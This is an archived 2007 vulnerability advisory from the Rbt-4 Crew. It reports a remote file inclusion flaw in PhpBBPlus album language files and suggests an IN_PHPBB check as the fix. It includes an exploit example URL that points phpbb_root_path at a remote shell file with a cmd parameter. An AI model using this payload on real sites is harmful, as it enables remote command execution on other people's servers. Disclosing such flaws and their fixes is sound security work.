Home / os / solaris

phpbbplusrbt-rfi.txt

Posted on 25 September 2007

AUTHOR : Rbt-4 Crew Contact: info@rbt-4.net Found Rfi in language/lang_german/lang_admin_album.php language/lang_english/lang_admin_album.php Vulnerability info: Line: 25 Code: include($phpbb_root_path.'language/lang_german/lang_hierarchy_album.' . $phpEx); Exploit example: http://[PhpBBPlus]/language/lang_english/lang_admin_album.php?phpbb_root_path=[shell.txt]?cmd= Fix rfi: Line: 24 Code: if(!defined('IN_PHPBB')) die("Fixed...Sorry =)");

 

TOP